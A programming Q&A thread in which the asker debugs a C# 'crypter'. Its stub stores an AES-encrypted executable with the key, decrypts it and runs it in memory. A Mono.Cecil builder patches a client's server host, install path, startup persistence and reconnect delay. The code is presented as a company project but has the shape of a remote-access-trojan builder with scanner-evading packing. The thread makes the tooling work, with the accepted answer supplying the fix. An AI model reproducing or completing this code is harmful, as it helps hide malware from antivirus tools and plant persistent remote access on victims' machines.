# Changed .net exe doesnt run

Tags: c#, reflection

So I have my project for the company, we change specific details in the exe according to the user that will be using it. To make this a lot easier we use Mono.Cecil and we then convert the exe to a base64 string and encrypt it. Then we put the encrypted string and password in a stub file which we compile:

```
using System;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;

namespace ConsoleApp1
{
class Program
{
    private static readonly string CData = "[BIN-DATA]";
    private static readonly string CDPWS = "[PASSWORD]";
    static void Main(string[] args)
    {
        Assembly a = Assembly.Load(AESDecrypt(Convert.FromBase64String(CData), CDPWS));
        MethodInfo entry = a.EntryPoint;
        ParameterInfo[] i = entry.GetParameters();
        entry.Invoke(null, null);
        Console.ReadLine();
    }
    public static byte[] AESDecrypt(byte[] input, string Pass)
    {
        RijndaelManaged AES = new RijndaelManaged();
        byte[] hash = new byte[32];
        byte[] temp = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(Pass));
        Array.Copy(temp, 0, hash, 0, 16);
        Array.Copy(temp, 0, hash, 15, 16);
        AES.Key = hash;
        AES.Mode = CipherMode.ECB;
        ICryptoTransform DESDecrypter = AES.CreateDecryptor();
        return DESDecrypter.TransformFinalBlock(input, 0, input.Length);
    }
}
}
```

When we compile this using this:

```
public class ClientCrypter
{
    private readonly string Stub = Properties.Resources.stub;
    public ClientCrypter(byte[] bytes, BuildOptions options)
    {
        var pw = RandomString(25);
        //Stub = Stub.Replace("\r\n", string.Empty);
        Stub = Stub.Replace("[BIN-DATA]", Convert.ToBase64String(AESEncrypt(bytes, pw)));
        Stub = Stub.Replace("[PASSWORD]", pw);
        CompilerParameters CParams = new CompilerParameters();

        CParams.GenerateExecutable = true;
        CParams.OutputAssembly = options.OutputPath;

        string _coptions = "/platform:x86 /target:winexe /unsafe";

        CParams.CompilerOptions = _coptions;
        CParams.TreatWarningsAsErrors = false;

        CParams.ReferencedAssemblies.Add("System.dll");
        CParams.ReferencedAssemblies.Add("System.Data.dll");
        Dictionary<string, string> ProviderOptions = new Dictionary<string, string>();
        ProviderOptions.Add("CompilerVersion", "v2.0");

        CompilerResults Results = new CSharpCodeProvider(ProviderOptions).CompileAssemblyFromSource(CParams, Stub);
        if(Results.Errors.Count != 0)
        {
            Console.WriteLine("ERROR");
        }
    }
    private string RandomString(int length)
    {
        string pool = "abcdefghijklmnopqrstuvwxyz0123456789";
        pool += pool.ToUpper();
        string tmp = "";
        Random R = new Random();
        for (int x = 0; x < length; x++)
        {
            tmp += pool[R.Next(0, pool.Length)].ToString();
        }
        return tmp;
    }
    private static byte[] AESEncrypt(byte[] input, string Pass)
    {
        RijndaelManaged AES = new RijndaelManaged();
        byte[] hash = new byte[32];
        byte[] temp = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(Pass));
        Array.Copy(temp, 0, hash, 0, 16);
        Array.Copy(temp, 0, hash, 15, 16);
        AES.Key = hash;
        AES.Mode = CipherMode.ECB;
        ICryptoTransform DESEncrypter = AES.CreateEncryptor();
        return DESEncrypter.TransformFinalBlock(input, 0, input.Length);
    }
}
```

and when we run the resulting exe it fails with the message:

```
Description:
  Stopped working

Problem signature:
  Problem Event Name:   CLR20r3
  Problem Signature 01: final-crypt.exe
  Problem Signature 02: 0.0.0.0
  Problem Signature 03: 59b5a7db
  Problem Signature 04: mscorlib
  Problem Signature 05: 2.0.0.0
  Problem Signature 06: 55f8f105
  Problem Signature 07: f52
  Problem Signature 08: 7
  Problem Signature 09: N3CTRYE2KN3C34SGL4ZQYRBFTE4M13NB
  OS Version:   6.1.7601.2.1.0.256.4
  Locale ID:    1033
```

But when I open the ConsoleApp1 project that should load the exe in visualstudio and provide the correct CData and CDPWS from a generated exe and run that it runs without any problem, tried to run it as admin and tried to look all over google but I couldnt find a solution for this. Could you point me in the right way?

Thanks

EDIT: Here is part of the class that changes the exe(before encryption) using Mono.Cecil:

```
public static class ClientBuilder
{
    public static void Build(BuildOptions options)
    {
        // PHASE 1 - Settings
        string encKey = FileHelper.GetRandomFilename(20), key, authKey;
        CryptographyHelper.DeriveKeys(options.Password, out key, out authKey);
        AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly("DM_Client.bin");

        foreach (var typeDef in asmDef.Modules[0].Types)
        {
            if (typeDef.FullName == "DM_Client.Config.Settings")
            {
                foreach (var methodDef in typeDef.Methods)
                {
                    if (methodDef.Name == ".cctor")
                    {
                        int strings = 1, bools = 1;

                        for (int i = 0; i < methodDef.Body.Instructions.Count; i++)
                        {
                            if (methodDef.Body.Instructions[i].OpCode.Name == "ldstr") // string
                            {
                                switch (strings)
                                {
                                    case 1: //version
                                        methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Version, encKey);
                                        break;
                                    case 2: //ip/hostname of server
                                        methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.RawHosts, encKey);
                                        break;
                                    case 3: //user key
                                        methodDef.Body.Instructions[i].Operand = key;
                                        break;
                                    case 4: //authentication key
                                        methodDef.Body.Instructions[i].Operand = authKey;
                                        break;
                                    case 5: //installsub
                                        methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallSub, encKey);
                                        break;
                                    case 6: //installname
                                        methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallName, encKey);
                                        break;
                                }
                                strings++;
                            }
                            else if (methodDef.Body.Instructions[i].OpCode.Name == "ldc.i4.1" ||
                                     methodDef.Body.Instructions[i].OpCode.Name == "ldc.i4.0") // bool
                            {
                                switch (bools)
                                {
                                    case 1: //install
                                        methodDef.Body.Instructions[i] = Instruction.Create(BoolOpcode(options.Install));
                                        break;
                                    case 2: //startup
                                        methodDef.Body.Instructions[i] = Instruction.Create(BoolOpcode(options.Startup));
                                        break;
                                }
                                bools++;
                            }
                            else if (methodDef.Body.Instructions[i].OpCode.Name == "ldc.i4") // int
                            {
                                //reconnectdelay
                                methodDef.Body.Instructions[i].Operand = options.Delay;
                            }
                            else if (methodDef.Body.Instructions[i].OpCode.Name == "ldc.i4.s") // sbyte
                            {
                                methodDef.Body.Instructions[i].Operand = GetSpecialFolder(options.InstallPath);
                            }
                        }
                    }
                }
            }
        }
        ClientCrypter C = new ClientCrypter(File.ReadAllBytes(options.OutputPath), options);
    }
    private static OpCode BoolOpcode(bool p)
    {
        return (p) ? OpCodes.Ldc_I4_1 : OpCodes.Ldc_I4_0;
    }
}
```

EDIT: if you decide to downvote, okay. But please take the time to tell me why you decided to downvote, so I can improve. Thank you

Comment: Can you provide something what we can try on our local machines?

Comment: Unrelated to the problem, do your company realize that process is completely futile? If anyone takes the exe and decompiles it will get the base64 data, the password and the cypher method...

Comment: @TcKs I'll see if I may provide a part.

Comment: @Gusman they don't, the guys whose place I took made it and I have to improve it. I already told them but they say it works so they will keep using it.

Comment: Ok, understood, I have found people like that :). Are both programs compiled with mono? You say the console app is compiled with mono.cecil, but is compiled the internal executable also with mono? that may cause the problem.

Comment: No, I'm sorry I think I havent explained it properly. They are all .Net compiled an I use Mono.Cecil.dll for AssemblyDefinition. I will add part of the class that uses it in a minute. So they are both compiled by .Net but the only difference is that the one that works is compiled by visual studio and the one that is compiled using the above provided class doesnt

Comment: Just trying - are you sure, the runtimes of exe & base64's assemble are same?

Comment: @TcKs oh my god, I'm sorry. totally forgot and feel asleep :( but yes the runtimes are exactly the same

Comment: Is it possible, that the ConsoleApp is compiled different in my program than in visual studio and that because of that it wont run? If you understand what I mean

Comment: Wait, I think I fixed it

Comment: Yep, fixed it. Going to write an answer

Answer (score 1, accepted):

So I decided to take a look again at how I compile it in the ClientCrypter class. And was thinking if different compiler options could cause this problem. And came to the conclusion that removing the line:

```
ProviderOptions.Add("CompilerVersion", "v2.0");
```

Fixed the issue and the application ran and worked